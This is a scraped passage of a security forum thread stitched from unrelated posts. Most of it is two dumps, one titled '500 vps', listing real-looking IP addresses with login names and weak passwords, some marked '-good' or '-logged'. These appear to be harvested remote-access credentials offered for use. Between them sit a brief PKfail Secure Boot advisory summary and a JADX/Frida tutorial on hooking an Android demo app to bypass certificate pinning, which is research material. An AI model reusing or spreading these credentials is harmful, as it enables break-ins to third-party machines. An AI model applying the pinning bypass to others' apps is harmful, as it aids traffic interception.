194.94.208.109,service,service 194.94.208.109,support,[null] 194.94.208.109,test,[null] 194.94.208.109,webmaster,webmaster 194.94.208.11,admin,[null] 194.94.208.11,guest,[null] 194.94.208.11,info,info 194.94.208.11,sales,sales 194.94.208.11,service,service 194.94.208.11,support,[null] 194.94.208.11,test,[null] 194.94.208.11,webmaster,webmaster 194.94.208.113,admin,[null] 194.94.208.113,guest,[null] 194.94.208.113,info,[null] 194.94.208.113,sales,[null] 194.94.208.113,service,[null] 194.94.208.113,support,support 194.94.208.113,test,[null] 194.94.208.113,webmaster,[null] 194.94.208.116,admin,[null] 194.94.208.116,guest,[null] 194.94.208.116,info,[null] 194.94.208.116,sales,[null] 194.94.208.116,service,[null] 194.94.208.116,support,[null] 194.94.208.116,test,test 194.94.208.116,webmaster,[null] 194.94.208.117,admin,[null] 194.94.208.117,guest,[null] 194.94.208.117,info,info 194.94.208.117,sales,[null] 194.94.208.117,service,[null] 194.94.208.117,support,[null] 194.94.208.117,test,[null] 194.94.208.117,webmaster,webmaster 194.94.208.118,admin,[null] 194.94.208.118,guest,[null] 194.94.208.118,info,info 194.94.208.118,sales,[null] 194.94.208.118,service,[null] 194.94.208.118,support,[null] 194.94.208.118,test,[null] 194.94.208.118,webmaster,webmaster 194.94.208.119,admin,[null] 194.94.208.119,guest,[null] 194.94.208.119,info,info 194.94.208.119,sales,[null] 194.94.208.119,service,service 194.94.208.119,support,[null] 194.94.208.119,test,[null] 194.94.208.119,webmaster,webmaster 194.94.208.123,admin,[null] 194.94.208.123,guest,[null] 194.94.208.123,info,[null] 194.94.208.123,sales,sales 194.94.208.123,service,[null] 194.94.208.123,support,[null] 194.94.208.123,test,[null] 194.94.208.123,webmaster,[null] 194.94.208.128,admin,[null] 194.94.208.128,guest,[null] 194.94.208.128,info,[null] 194.94.208.128,sales,sales 194.94.208.128,service,service 194.94.208.128,support,support 194.94.208.128,test,[null] 194.94.208.128,webmaster,[null] 194.94.208.131,123,123 194.94.208.131,1234,1234 194.94.208.131,1236,1236 194.94.208.131,abc123,abc123 194.94.208.131,abuse,abuse 194.94.208.131,account,account 194.94.208.131,admin,[null] 194.94.208.131,admin,admin 194.94.208.131,administrator,administrator 194.94.208.131,allison,allison 194.94.208.131,amanda,amanda 194.94.208.131,andrew,andrew 194.94.208.131,angela,angela 194.94.208.131,canon,canon 194.94.208.131,carol,carol 194.94.208.131,chris,chris 194.94.208.131,chuck,chuck 194.94.208.131,cindy,cindy 194.94.208.131,computer,computer 194.94.208.131,david,david 194.94.208.131,dragon,dragon 194.94.208.131,general,general 194.94.208.131,guest,[null] 194.94.208.131,guest,guest 194.94.208.131,guest,guest12 194.94.208.131,harley,harley 194.94.208.131,helen,helen
  17. Nytro

    PKfail

    PKfail The Binarly REsearch team discovered a key leak incident from American Megatrends stemming back to 2018. PKfail involves multiple devices and product lines and enables attackers to gain secure boot access similar to BlackLotus. Check for PKfail Now Read report Check for PKfail PKfail: Untrusted Platform Keys Undermine Secure Boot on UEFI Ecosystem ‍ July 25, 2024 The Binarly REsearch Team The Binarly REsearch team today discloses a key leak incident from American Megatrends stemming back to 2018. PKfail involves multiple devices and product lines and enables attackers to gain secure boot access similar to BlackLotus. July 24, 2024 [BRLY-2024-005] Usage of default test keys leads to complete Secure Boot bypass The Binarly REsearch Team has found that hundreds of devices use an insecure Platform Key (PK) which represents the root of trust for UEFI Secure Boot. Affected Devices Sursa: https://www.binarly.io/pkfail
  18. Reverse engineering & modifying Android apps with JADX & Frida I get a lot of emails from users who want to know exactly what their favourite Android app is doing, and want to tweak and change how that works for themselves. There are some great tools to do this, including JADX & Frida, but using these is complicated, and every reverse engineering problem has its own unique challenges & solutions. There's few good guides to getting started, and even fewer guides on the advanced tricks available. In this article, I want to talk you through the core initial steps to look inside any Android app, give you the tools to find & understand the specific code that matters to you, and then show you how you can use that information to modify the app for yourself. Let's set the scene first. Context I'm assuming here that somebody else has written an Android app that you're interested in. You want to know exactly how a specific bit of behaviour works, and you want to change what it's doing. I'm going to focus on the classic HTTP Toolkit user example here of certificate pinning: where security-conscious apps that send HTTPS traffic go beyond the normal HTTPS validation requirements, and actively check that the HTTPS certificates used are from a small set of specific trusted certificates, not just the standard set trusted by all Android devices. (I'm focusing on certificate pinning because it's a common use case and it's convenient, but the techniques here work for all other kinds of reverse engineering & patching too, don't worry!) Certificate pinning is a problem for HTTP Toolkit users, who are trying to intercept HTTPS traffic to see what messages their Android apps are sending & receiving. It's not possible to intercept these app's traffic because they won't trust HTTP Toolkit's certificate, even after it's been injected into the device's system certificate store. Using the tools we're going to talk about in a moment we can take an unknown 3rd party app, find the certificate pinning code within it, and disable that remotely while the app runs on our device. This makes it possible to intercept, inspect & mock all of its traffic in any way we like! This isn't not easy, but it's usually not necessary. For starters, 99% of apps don't use certificate pinning beyond Android's standard restrictions, and for that case if you use HTTP Toolkit on a rooted device you're done in one click. For most apps that do explicitly pin their certificates, you can disable that using this general-purpose Frida script which already knows how to disable all the most popular cert pinning libraries available. In some cases though apps implement their own custom certificate pinning logic, or do something else unusual, which means the general-purpose script can't recognize and disable the right APIs. In these kinds of cases, or if you're trying to modify any other kinds of app behaviour, you need to roll up your sleeves and get your hands dirty. For this article, I've prepped an certificate pinning demo app: Each button sends an HTTPS request, and validates the connection in a slightly different way. The 'unpinned' option does nothing, the next 4 use various standard pinning techniques, and the last button uses totally custom code to manually check the certificate. If you use this with HTTP Toolkit normally, you can only intercept the first request. If you use the general-purpose Frida script, you can intercept the next 4 too, but not the last one. In this article we're going to focus on that last button, reverse engineer this app to see how it works, and write a custom Frida script to disable the certificate checking functionality. The Plan To reverse engineer an app and hook some behaviour, there's a few core steps you need to work through: Download a copy of the app on your computer Extract the source code Find the code we're interested in Understand how that code works Write a Frida hook to change how that code works Download the app Android apps are generally published to the Google Play store, but you can't easily download the app from there directly to mess around with on your computer. Fortunately, many sites that mirror the Google Play store, and do provide direct downloads of almost all available apps. ApkMirror.com and ApkPure.com are two good examples. In the general case, you should go to your favourite APK mirror site, and download the latest APK for the app you're interested in. In this specific case, I wrote the app, so I've conveniently published it directly on GitHub. You can download its APK here. Android app formats What is this APK file? Let's start with some quick but necessary background on Android app formats. There's two distribution formats you'll run into: APKs (older) and XAPKs (newer, also known Android App Bundles). In this example, the app is provided as a single APK, so that's easy enough, but many other apps you'll run into may be XAPKs, so it's worth understanding the difference. APKs are fairly simple: they're a ZIP file with a bunch of metadata, all the application's assets & config files, and one or more binary .dex files, which contain the compiled application. XAPKs are more complicated: they're a zip file that contains multiple APKs. In practice, they'll contain one large primary APK, with the main application code & resources, and then various small APKs which include the config or resources only relevant to certain types of devices. There might be separate config APKs for devices with larger screens, or different CPU architectures. For reverse engineering you usually just need the main APK, and you can ignore the rest. Extract the code Inside the APK, if you open it as a zip, you'll find a large classes.dex file (for multidex apps, there might even be a classes2.dex or more). These DEX files contain all the JVM classes of the application, in the compiled bytecode format used by Android's Runtime engine (ART, which replaced Dalvik a few years back). These DEX files contain the compiled application, but do not contain all the original source. Many things, most notably including local variable names & comments, are lost when compiling an Android application, and it's always impossible to extract those from the app. The external interfaces of each class are generally present here though (assuming that obfuscation wasn't used). That will usually be enough to find the method that you're interested in. Using those external interfaces you can usually then deduce what each line is trying to do, and progressively rename variables and add your own comments until you have some code that makes sense. To start that process, we need to convert the DEX file into a format we can mess around with ourselves. The best tool to do this is JADX (you can download it from their GitHub release page). Once JADX is installed, you run it like so: jadx ./pinning-demo.apk This will create a folder with the same name as the APK, containing 'resources' and 'sources' folders. The sources folder is what we're interested in: this is JADX's best guess at the Java source code that would've generated this DEX file. It's not perfect, but it should be pretty close. If you use JADX on the latest pinning demo APK, you'll find a structure like this: sources/ android/ - the core Android classes androidx/ - Android Jetpack classes com/ android/volley/ - The Volley HTTP client datatheorem/android/trustkit - One of the popular pinning libraries used google/ - Firefox, GSON & various other Google packages kotlin/ - runtime components of Kotlin okhttp3/ - OkHttp3, a popular HTTP library [...various other namespaces & packages] tech/httptoolkit/pinning_demo/ - the main application code Once you've extracted the code from an app like this, you can explore it any way you like - using Android Studio, using any other text editor, or just grepping for interesting text, it's up to you. By default, I'd recommend using some editor that can highlight and do basic automated refactoring (variable renaming) on Java code, since that'll make the next steps much easier. Find the code you care about Which code you want to reverse engineer & hook depends on the problem you're trying to solve. In my case, the problem is that when I intercept the app's HTTP using HTTP Toolkit and press the "Manually pinned request" button, I get a "Certificate rejected" message in HTTP Toolkit, and I want to stop that happening. That message typically means that the app is pinning a certificate - i.e. even though the HTTP Toolkit certificate is trusted on the device, the app is including its own custom checks, which are rejecting the HTTPS certificates and blocking HTTP Toolkit's automatic HTTP interception. So, the goal here is to find out which bit of code is making the custom-checked HTTPS request behind that last button, find out where that checks the certificate, and then later disable that check. Whatever code you want to change in your case, there are a lot of tricks available to help you hunt it down. Let's try out a few different approaches on this demo app. Search for relevant strings In my case, I know the failing request is going to sha512.badssl.com (a known-good HTTPS test site) so searching for that is a good start. That works, and gives me a few different places in the code that are sending requests, but there's options here for all the different possible pinning mechanisms, and related config files too. It's not immediately clear which code is relevant, so it'd be better to find something more precise. Some other strings that might be interesting, for the certificate pinning case: checkCert validateCert pinning pinner certificate SSL TLS Here you're looking for anything might be included in the name of a class, field or method, or which might be included in strings (e.g. error messages), since all of that will be preserved and searchable in the decompiled code. For example, if you're trying to understand where some HTTP API data comes from, you could try searching for the API endpoint path, or the name of query parameters. If you're looking for the implementation of a specific algorithm, it's worth searching for the common domain terms in that algorithm, or if you're trying to extract secrets or keys from the app then 'secret', 'key', and 'auth' are all worth investigating. Search for usage of relevant Java APIs Although local variable names aren't available, and in obfuscated apps even the class & package names may be obscured, the built-in JVM classes & package names are always available and unchanged. That means they're a great way to find related functionality. If you know the code you're interested in is likely to be using a certain data type, calling a specific API, or throwing a certain type of exception, you can use that to immediately narrow down your search. In this example, I think it's likely that all manual certificate checks are going to be using java.security.cert.X509Certificate, so I can search for usages of that type. This does give some good answers! Unfortunately though the entire app is filled with lots of different ways to do certificate pinning, by design, so this still comes back with a long list of matches, and it's not easy to tell which is relevant immediately. In most other apps that won't be a problem (most apps implement certificate pinning just the once!) and we could trawl through the results, but for now it's better to test out some other options first. Check for HTTP error reports Many apps nowadays include automatic error reporting using tools like Sentry. This is useful to app developers, but also to reverse engineers! Even when the app's own requests may use certificate pinning, requests sent by external libraries like these generally will not, so they're inspectable using HTTP Toolkit (or any other HTTP MitM proxy). That's useful because those requests themselves will usually include the stacktrace for any given error. This provides an excellent way for finding the source of any errors that you want to work around: Intercept traffic from your device using HTTP Toolkit or another proxy Trigger the error Look through the captured HTTP traffic for error reports Find the stacktrace in the relevant error report Follow the stacktrace into the codebase extracted earlier to immediately find the relevant code Bingo! In this case though, we're out of luck, as it's a tiny demo app with no error reporting. More searching required. Check ADB for errors Very commonly, apps will log errors and extra info to the console for easy debugging. Android captures this output from all running JVM processes in a single output buffer, along with stack traces from all uncaught errors, and makes that accessible via ADB using the logcat command. Outputting errors and debug info here is especially common in smaller apps which don't use an automated error reporting tool, so if you're looking to find & change some code that throws errors it's a great alternative to the previous approach. Even in non-error cases, the output here can provide excellent clues about application behaviour at the moments you're interested in. To capture the logs from a device, run: adb logcat -T1 This will stream the live logs from your device, without the history, until you stop it. It's often useful to pipe this to a file instead (i.e. ... > logs.txt) to save it for more detailed later analysis, since there can be a lot of noise here from other activity on the device. While this command is running, if you reproduce your error, you'll frequently find useful error stacktraces or error messages, which can then guide you to the right place in the code. For our demo app, this works great. By enabling logging when pressing the button, if you look carefully between the other noisy log output, we can now get the specific error message unique to that button: > adb logcat -T1 --------- beginning of main ... 11-22 10:46:16.478 31963 31963 I Choreographer: Skipped 114 frames! The application may be doing too much work on its main thread. 11-22 10:46:16.996 1785 1785 D BluetoothGatt: close() 11-22 10:46:16.997 1785 1785 D BluetoothGatt: unregisterApp() - mClientIf=5 11-22 10:46:17.000 791 1280 I bt_stack: [INFO:gatt_api.cc(1163)] GATT_CancelConnect: gatt_if:5, address: 00:00:00:00:00:00, direct:0 11-22 10:46:17.092 573 618 D LightsService: Excessive delay setting light 11-22 10:46:17.258 282 286 E TemperatureHumiditySensor: mCompEngine is NULL 11-22 10:46:18.773 26029 26129 I System.out: java.lang.Error: Unrecognized cert hash. 11-22 10:46:19.034 26029 26080 W Adreno-EGL: <qeglDrvAPI_eglGetConfigAttrib:607>: EGL_BAD_ATTRIBUTE ... We can search the codebase for this Unrecognized cert hash error message, and conveniently that message is shown in exactly one place. This error is appears deep inside invokeSuspend in MainActivity$sendManuallyCustomPinned$1.java: throw new Error("Unrecognized cert hash."); Explore the code in depth Still stuck? At this point, your best bet is to try and explore the application more generally, or to explore around the best clues you've found so far. To do so, you can use the manifest (in resources/AndroidManifest.xml) to find the entrypoints for every activity and background service registered in the application. Start with the services (i.e. background processes) or activities (i.e. a visible page of the UI) that sound most relevant to your situation, open up the corresponding source, and start digging. This can be time consuming. Keep going! You don't need to dig into every detail, but walking through here can quickly give you an idea of the overall architecture of the app, and you can often use this to find the code that's relevant to you. It's well worth keeping notes & adding inline comments as you go to keep track of the process. Understand the code Hopefully by this point you've found the code that's relevant to you. In this demo app, that code decompiled by JADX looks like this: public final Object invokeSuspend(Object obj) { IntrinsicsKt.getCOROUTINE_SUSPENDED(); if (this.label == 0) { ResultKt.throwOnFailure(obj); this.this$0.onStart(R.id.manually_pinned); boolean z = true; try { TrustManager[] trustManagerArr = {new MainActivity$sendManuallyCustomPinned$1$trustManager$1()}; SSLContext instance = SSLContext.getInstance("TLS"); instance.init(null, trustManagerArr, null); Intrinsics.checkExpressionValueIsNotNull(instance, "context"); Socket createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443); if (createSocket != null) { SSLSocket sSLSocket = (SSLSocket) createSocket; SSLSession session = sSLSocket.getSession(); Intrinsics.checkExpressionValueIsNotNull(session, "socket.session"); Certificate[] peerCertificates = session.getPeerCertificates(); Intrinsics.checkExpressionValueIsNotNull(peerCertificates, "certs"); int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { z = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; Intrinsics.checkExpressionValueIsNotNull(certificate, "cert"); if (Boxing.boxBoolean(mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)).booleanValue()) { break; } i++; } if (z) { PrintWriter printWriter = new PrintWriter(sSLSocket.getOutputStream()); printWriter.println("GET / HTTP/1.1"); printWriter.println("Host: untrusted-root.badssl.com"); printWriter.println(""); printWriter.flush(); System.out.println((Object) ("Response was: " + new BufferedReader(new InputStreamReader(sSLSocket.getInputStream())).readLine())); sSLSocket.close(); this.this$0.onSuccess(R.id.manually_pinned); return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); } throw new TypeCastException("null cannot be cast to non-null type javax.net.ssl.SSLSocket"); } catch (Throwable th) { System.out.println(th); this.this$0.onError(R.id.manually_pinned, th.toString()); } } else { throw new IllegalStateException("call to 'resume' before 'invoke' with coroutine"); } } There's a lot going on here! The original code (here) is written in Kotlin and uses coroutines, which adds a lot of extra noise in the compiled output. Fortunately, we don't need to understand everything. To change this behaviour, we just need to work out what code paths could lead to the highlighted line above, where the error is thrown. As you can see here, JADX has taken some best guesses at the variable names involved in this code, inferring them from the types created (e.g. printWriter = new PrintWriter) and from the methods called (peerCertificates = session.getPeerCertificates()). This is pretty clever, and helps a lot to see what's happening. It's not perfect though. You can see from some inferred variables like createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443), where the variable has just taken the name of the method, or the z boolean variable, where no clues where available to infer anything useful at all. If you have experience with code like this it may be easy to see what's happening here, but let's walk through it step by step: The line we're interested in only runs if z is false, since the preceeding if (z) block ends with return. We can rename z to isCertValid (made easier by automated refactoring) and remove some Kotlin boilerplate to make the code immediately clearer, giving us code like: boolean isCertValid = true; //... int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { isCertValid = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; if (mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)) { break; } i++; } if (isCertValid) { // ... return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); The block before the if is while (true), so this code only runs after that breaks. The break commands happen after either checking all values (setting isCertValid to false) or after doesCertMatchPin returns true for one value. That means the exception is only thrown when doesCertMatchPin returns false for all values, and that method is indeed what causes our problem. This gives us a good understanding of the logic here: the code checks every certificate linked to a socket, and calls doesCertMatchPin from the MainActivity class to compare it to BADSSL_UNTRUSTED_ROOT_SHA256. This is an intentionally simple example. Real examples will be more complicated! But hopefully this gives you an idea of the process, and the same techniques of incremental renaming, refactoring and exploring can help you understand more complex cases. It's worth noting that the relatively clear code here isn't always available, usually because obfuscation techniques are used to rename classes, fields & methods throughout the code to random names (a, b..., aa, ab...). In that case, the same process we're discussing here applies, but you won't have many of the names available as clues to start with, so you can only see the overall structure and references to built-in JVM APIs. It is still always possible to reverse engineer such apps, but it's much more important to quickly find the precise code that you're interested in before you start, and the process of understanding it is significantly more difficult. That's a topic for another blog post though (watch this space). Patch it with Frida Once we've found the code, we need to think about how to change it. For our example here, it's easy: we need to make doesCertMatchPin return true every time. Be aware Frida gives you a lot of power to patch code, but the flexibility is not unlimited. Frida patches are very focused on method implementation replacement, and it's very difficult (if not impossible) to use Frida to patch to individual lines within existing methods. You need to look out for method boundaries at which you can change behaviour. For certificate pinning, that's fairly easy, because certificate checks are almost always going to live in a separate method like checkCertificate(cert), so you can focus on that. In other cases though this can get more complicated. In this specific case, we're looking to patch the doesCertMatchPin function in the tech.httptoolkit.pinning_demo.MainActivity class. Within a Frida script, we first need to get a reference to that method: const certMethod = Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin; Then we need to assign an alternative implementation to that method, like so: certMethod.implementation = () => true; After this patch is applied, the real implementation of that doesCertMatchPin method will never be called, and it'll just return true instead. This is a simple example. There's many more complex things you can do though. Here's some examples: // Disable a property setter, to stop some fields being changed: const classWithSetter = Java.use("a.target.class"); classWithSetter.setATargetProperty.implementation = () => { return; // Don't actually set the property }; // Wrap a method, to add extra functionality or logging before and after without // changing the existing functionality: const classToWrap = Java.use("a.target.class"); const originalMethod = classToWrap.methodToWrap; classToWrap.methodToWrap.implementation = () => { console.log('About to run method'); const result = originalMethod.apply(this, arguments); console.log('Method returned', result); return result; }; // Hook the constructor of an object: const classToHook = Java.use("a.target.class"); const realConstructor = classToHook.$init; classToHook.$init.implementation = () => { // Run the real constructor: realConstructor.apply(this, arguments); // And then modify the initial state of the class however you like before // anything else gets access to it: this.myField = null; }; There's a huge world of options here - those are just some of the basic techniques at your disposal. Once you've found a method you want to patch and you've got an idea how you'll do it, you need to set up Frida (see this guide if you haven't done so already) to test it out. Once Frida is working you can test out your patch interactively, and tweak it live to get it working. For example, to test out our demo hook above: Attach HTTP Toolkit to the device Run the app, check that the "Manually pinned request" button fails and shows a certificate error in HTTP Toolkit. Start Frida server on the device Restart your application with Frida attached by running: frida --no-pause -U -f tech.httptoolkit.pinning_demo This will start the app, and give you a REPL to run Frida commands Run Java.perform(() => console.log('Attached')) to attach this process to the VM & class loader (it'll pause briefly, then log 'Attached'). Test out some hooks. For our demo app, for example, you can hook the certificate pinning function by running: Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin.implementation = () => true; Clear the logs in HTTP Toolkit, and then press the "Manually pinned request" button again It works! The button should go green, and the full request should appears successfully in HTTP Toolkit. Once you've something that works in a REPL, you can convert it into a standalone script, like so: Java.perform(() => { console.log("Patching..."); const mainActivityClass = Java.use("tech.httptoolkit.pinning_demo.MainActivity"); const certMethod = mainActivityClass.doesCertMatchPin; certMethod.implementation = () => true; console.log("Patched"); }); and then you can run this non-interactively with Frida using the -l option, for example: frida --no-pause -U -f tech.httptoolkit.pinning_demo -l ./frida-script.js That command will restart the app with the script injected immediately, so that that certificate pinning behind this button is unpinned straight away, and tapping the button will always show a successful result: If you want examples of more advanced Frida behaviour, take a look through the my cert unpinning script for certificate pinning examples for every popular library and some other interesting cases, or check out this huge selection of Frida snippets for snippets demonstrating all sorts of other tricks and APIs available. I hope you find this helps you to reverse engineer, understand & hook Android applications! Have questions or run into trouble? Get in touch on Twitter, file issues against my Frida script, or send me a message directly. Published 4 days ago by Tim Perry Sursa: https://httptoolkit.tech/blog/android-reverse-engineering/
  19. criss84

    500 vps

    82.78.195.254@test;test 193.251.65.216@test;test 109.74.128.190@test;test 62.215.133.26@test;test 217.128.33.157@test;test 212.74.218.206@test;test 175.139.144.4@test;test 83.228.32.145@test;123 86.57.244.81@test;test 119.203.160.244@test;test 58.137.115.29@test;test 202.83.214.18@test;test 87.139.98.163@admin;1234 75.146.215.133@test;test 58.137.173.12@test;test 82.201.213.18@test;123 178.72.237.34@test;test 80.228.76.130@administrator;admin 178.23.215.6@administrador;admin 111.1.79.240@administrator;1 201.74.173.112@admin;admin 41.134.33.178@administrator;p@ssw0rd 208.38.69.73@administrator;admin 181.31.194.117@administrador;1234 115.133.159.78@administrator;p@ssw0rd 220.166.95.178@administrator;1 93.107.101.65@test;test 60.169.17.167@administrator;admin 76.79.229.179@user;user 76.79.104.246@user;user 194.30.41.236@user;user 151.1.217.220@user;user 80.153.134.237@user;user 202.124.150.15@user;user 201.120.67.226@user;user 38.82.206.34@user;user 74.101.57.23@test;test 75.125.15.234@user1;user1 208.71.48.170@student;123 72.18.234.132@user;user 12.53.113.139@user;user 63.138.49.238@user;user 72.25.125.102@user;user 66.245.228.152@user;user 189.201.242.131@user;user 64.245.115.242@user;user 46.47.199.90@test;test 88.26.209.5@test;test 77.235.202.86@test;test 193.251.70.106@test;test 74.86.35.95@test;test 207.164.177.210@test;test 49.248.101.143@test;test 183.182.89.201@test;test 91.192.61.5@test;123 193.251.5.195@test;test 188.165.75.120@test;123 79.120.76.58@test;test 58.128.177.190@test;test 206.169.46.245@test;test 200.89.138.202@administrator;administrator 95.45.225.93@administrator;admin 184.71.68.54@administrator;admin 62.215.133.27@test;test 182.71.176.91@test;test 61.78.63.85@test;test 209.183.69.218@test;test 175.139.242.180@administrator;1234 202.147.189.131@administrator;123 122.201.246.187@administrator;admin 114.32.44.207@administrator;1234 61.233.11.58@administrator;administrator 91.196.76.70@administrator;admin 120.38.60.33@administrator;123 85.72.49.159@administrator;admin 220.132.110.208@administrator;admin 183.102.14.38@administrator;1234 85.71.180.253@test;test 221.195.110.69@administrator;server 110.167.126.114@administrator;123 118.186.253.205@administrator;admin 114.255.121.186@administrator;123 61.148.69.18@administrator;1 80.28.51.105@administrador;admin 200.68.99.217@administrador;admin 202.78.74.37@administrator;p@ssw0rd 88.3.170.189@administrador;admin 60.54.192.108@test;test 212.98.191.228@test;test 203.45.212.72@test;test 182.71.81.210@user;user 85.105.246.126@user1;user1 117.218.57.58@user1;123 78.187.40.7@1;1 37.53.66.157@user2;1 122.160.53.220@user;admin 187.53.192.234@user2;user2 80.32.210.82@server;server 113.161.161.138@1;1 201.74.173.112@admin;admin 72.55.164.46@user;user 92.126.217.185@user1;1 95.170.181.82@user1;1234 222.185.235.174@user;1234 205.247.32.226|reports|reports 216.199.120.51|conference|conference 216.31.233.114|conference|conference 70.164.244.143|assistant1|assistant1 71.119.17.63|user1|123456 71.172.10.26|assistant|assistant 71.178.172.73|support|support 71.86.30.194|conference|conference 72.156.49.148|assistant|assistant 216.136.158.168|assistant1|assistant1 64.47.117.39|exmerge|exmerge 169.244.176.172|staff|staff1 38.108.40.177|GADOMAINbackupexec|backup 96.57.31.130|SMALLBUSINESSbackup|treicoaste001 66.115.24.151|backup|nagasaki001 206.169.37.75|backup|nagasaki001 64.238.119.130|CHECKERshop1|nagasaki 65.210.152.6|cafeuser|cafeuser 208.4.156.36|TERMINALbackup|nagasaki001 209.159.35.91|backup|nagasaki001 96.33.254.153|warehouse|warehouse 71.14.23.70|AQFshipping|shipping 72.16.183.187|ACGshipping|shipping 74.7.73.202|NSshipping|shipping 216.231.26.219|CPH-CORPinstall|install 74.113.142.69|TACYMEDICALshipping|password 72.32.87.77|256793-WEB1install|install 70.43.46.210|SURVIVALARMORcafeuser|cafeuser 65.48.30.5|KSKtom|tom 67.113.205.148|DOMAIN3clerk|password 199.36.85.139|GSCLEGALscans|scans 207.178.196.148|WDclerk|password 207.47.91.245|PAMCODavid|trustno1 208.180.56.237|testing|123456 209.116.58.15|copier|password 209.254.12.115|conference| 216.215.108.114|shipping|shipping1 216.31.252.148|test1|test 64.165.183.44|diamondsharpparts|parts 188.173.254.166@Administrator;password 80.32.129.14@Administrator;password 62.96.52.66@Administrator;password 216.14.19.42@Administrator;password 208.80.239.233@Administrator;password 31.194.99.109@Administrator;password 219.88.71.151@Administrator;password 97.67.6.105@Administrator;password 109.2.59.192@conference;grace 62.38.219.148@conference;grace 213.247.120.205@conference;grace 12.53.113.139@conference;grace 66.208.184.171@conference;grace 63.138.49.238@conference;grace 75.127.54.179@conference;grace 217.145.242.149@administrator;12380.191.104.102@ad ministrator;123 173.243.81.142@user;user 69.85.255.102@user;user 72.12.127.236@user;user 67.23.218.178@user;user 71.149.175.74@user;user 75.149.172.25@user;server 77.245.129.66@test;test 66.245.228.152@user;user 193.251.70.106@test;test 213.182.230.58@test;test 78.90.64.226@test;test 109.71.183.66@test;1 174.141.98.44@test;test 37.148.230.63@admin;admin 83.228.32.145@test;123 82.201.213.18@test;123 210.44.1.5@test;test 87.139.163.253@administrator;admin 99.91.142.46@test;123 24.186.51.106@admin;admin 62.94.154.3@administrator;admin 108.179.51.227@admin;admin 89.120.92.142@user1;1234 87.139.138.184@administrator;admin 194.44.94.204@administrator;1 74.111.167.72@administrator;administrator 184.70.9.234@administrator;admin 59.152.246.230@admin;admin 94.84.221.126@administrator;admin 200.89.138.202@administrator;administrator 208.96.234.74@administrator;admin 202.136.220.78@admin;123 213.34.215.74@administrator;administrator 121.170.101.63@administrator;admin 61.233.11.58@administrator;administrator 78.186.200.14@user1;123456 79.148.118.98@administrador;admin 119.6.100.131@administrator;1 175.98.145.200@administrator;admin 80.32.112.55@administrador;123 80.38.13.221@administrador;admin 213.98.179.14@administrador;admin 189.72.101.73@administrador;1234 221.2.55.234@administrator;administrator 78.85.32.125@user1;user1 200.146.215.112@oficina;1234 200.146.215.113@oficina;1234 200.146.215.114@oficina;1234 200.146.215.115@oficina;1234 200.146.215.117@oficina;1234 200.146.215.118@oficina;1234 200.146.215.119@oficina;1234 82.207.40.204@1c_user2;123 82.207.23.43@Alexandr;1 82.207.74.120@Buhgalter;1 82.207.32.159@buxgalter;1 82.207.96.138@Kassa1;1 82.207.41.253@Marina;123 83.69.113.170@user1;123 85.95.136.23@elena;1 80.70.233.143@sveta;1 81.25.164.31@elena;123456 202.191.247.99@user2;123 72.18.234.132@administrator; 94.107.252.243@user;user 201.0.131.59@user;1234 96.57.134.59@user;user 82.207.74.120@sklad;1 195.5.19.174@sklad;123456 97.67.2.234@user;user -- 72.18.234.132@user;user, 80.228.29.18@user;user 65.38.212.27@user;user 202.124.150.13@user;user 80.14.248.105@test;test 81.25.47.143@sklad;0 -good 121.246.64.37@admin;123 80.28.134.78@administrador;123456 210.4.56.81@user1;user1 -logged 189.45.48.114@user;user 203.186.80.24@user;user 94.81.137.126@user;user 208.234.33.211@user;user 2.112.88.181@user;user 201.120.67.226@user;user 151.1.217.220@user;user 74.43.111.215@user;user 74.253.103.120@user;user 63.138.49.238@user;user 186.238.51.142@user;user 190.85.188.74@user;user 77.105.43.195@user;123 196.219.169.235@test;123456 80.153.134.237@user;user 80.73.1.4@user;user 202.124.150.15@user;user 217.21.249.12@user;user 201.120.67.226@administrator;pass 81.25.47.143@sklad;0 210.4.56.81@user1;user1 58.131.6.85@user1;123 142.165.61.12@user;user 170.2.4.199@user;user 196.218.150.114@user;user 118.99.206.225@user1;user1 77.43.60.53@user;user 200.129.173.3@user;user 187.115.67.231@admin;123 59.90.206.174@user1;user1 77.94.103.135@user1;1 175.139.144.6@test;test 165.138.167.9@test;test 219.92.72.122@user;user 189.201.242.131@user;user 66.160.138.85@user;user 199.26.210.245@user;user 70.182.119.150@user;user 77.28.98.47@user;user 95.79.54.42@test;test 196.217.240.20@user1;123 217.66.229.202@user;123456 95.79.96.55@test;test 96.33.254.153;warehouse;warehouse --United States-TN-Kingsport 96.52.247.150;remote;remote Canada-AB-Edmonton ** 63.138.101.109;sales;sales United States-NY-Fairport 96.22.115.162;camera;camera Canada-QC-Montreal ** 216.174.238.58;counter;counter United States-WA-Yakima ** 216.174.238.82;counter;counter United States-WA-Yakima 216.196.206.194;office;staff United States-- 63.239.79.46;student;student United States-AZ-Chinle 216.174.238.58;counter;counter United States-WA-Yakima 63.230.130.70;user;user United States-WA-Spokane 96.234.156.35;xerox;xerox United States-MD-Annapolis 216.255.244.100;test3;Pa$$w0rd United States-FL-Ocala 65.182.241.24;info;Password1 86.51.170.163@admin;admin 93.125.93.13@test;test 190.54.40.103@user;user 95.65.61.112@test;test 88.249.217.12@test;123456 71.248.114.19@user;user 85.72.60.11@user;1234 113.161.161.138@1;1 27.251.23.122@user;admin 65.41.114.140@user1;123 188.27.131.7@user;user 80.78.73.143@user;user 50.74.234.194@user1;user1 208.180.6.202@user;user 173.196.228.162@user;user 82.200.195.178@user;123 109.86.66.108@user;user 91.144.167.168@user;123 217.169.211.13@user;123 202.191.247.99@user2;123 97.67.2.234@user;user 210.4.56.81@user1;user1 soheil_faraz2@yahoo.com 186.251.180.206@admin;admin 186.244.79.212@admin;2012 186.231.66.218@administrator;p@ssw0rd 186.244.100.103@administrador;q1w2e3r4t5 